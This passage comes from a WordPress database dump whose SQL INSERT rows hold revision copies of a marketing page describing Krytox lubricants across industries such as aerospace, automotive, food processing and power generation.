efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:48:46', '2016-09-28 17:48:46', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2100, 2, '2016-09-28 17:56:17', '2016-09-28 17:56:17', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:56:17', '2016-09-28 17:56:17', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2101, 2, '2016-09-28 17:56:44', '2016-09-28 17:56:44', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" hello span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n[col span__sm="12"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	